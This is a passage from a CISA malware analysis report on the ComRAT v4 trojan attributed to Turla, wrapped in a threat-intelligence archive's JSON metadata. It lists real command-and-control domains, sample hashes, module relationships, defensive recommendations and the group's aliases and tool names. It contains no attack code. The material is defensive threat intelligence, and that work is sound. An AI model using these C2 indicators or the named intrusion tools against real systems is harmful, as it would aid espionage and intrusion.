NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nwekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nwekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nbranter.tk\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\nNo Whois record at the time of analysis.\r\nRelationships\r\nbranter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nbranter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\n166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nTags\r\ntrojan\r\nDetails\r\nName Communication_module_64.dll\r\nSize 64000 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 54902e33dd6d642bc5530de33b19e43c\r\nSHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28\r\nSHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nSHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d27\r\nssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qM\r\nEntropy 5.939047\r\nAntivirus\r\nESET a variant of Win64/Turla.CN trojan\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 12 of 15\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:37:48-05:00\r\nImport Hash 87ab41c57e95562a3e81f0609398b278\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n199ab75383a70bd1148671ca1c689d0e header 1024 2.031353\r\n46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363\r\na97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592\r\nc5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435\r\nRelationships\r\n166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n166b1fb3d3... Connected_To bronerg.tk\r\n166b1fb3d3... Connected_To crusider.tk\r\n166b1fb3d3... Connected_To duke6.tk\r\n166b1fb3d3... Connected_To sanitar.ml\r\n166b1fb3d3... Connected_To wekanda.tk\r\n166b1fb3d3... Connected_To branter.tk\r\nDescription\r\nThis application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim's\r\nsystem default browser by \"ComRATv4.exe\"\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit\r\ncommunication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).\r\nRelationship Summary\r\n1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\na3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\na3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n44d6d67b53... Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\n44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\n00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n00352afc7e... Connected_To branter.tk\r\n00352afc7e... Connected_To wekanda.tk\r\n00352afc7e... Connected_To sanitar.ml\r\n00352afc7e... Connected_To duke6.tk\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 13 of 15\n\n00352afc7e... Connected_To bronerg.tk\r\n00352afc7e... Connected_To crusider.tk\r\nbronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nbronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\ncrusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\ncrusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nsanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nsanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nwekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nwekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nbranter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nbranter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n166b1fb3d3... Connected_To bronerg.tk\r\n166b1fb3d3... Connected_To crusider.tk\r\n166b1fb3d3... Connected_To duke6.tk\r\n166b1fb3d3... Connected_To sanitar.ml\r\n166b1fb3d3... Connected_To wekanda.tk\r\n166b1fb3d3... Connected_To branter.tk\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 14 of 15\n\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Service Desk .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" ], "report_names": [ "ar20-303a" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775441528, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.pdf", "text": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.txt", "img": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.jpg" } }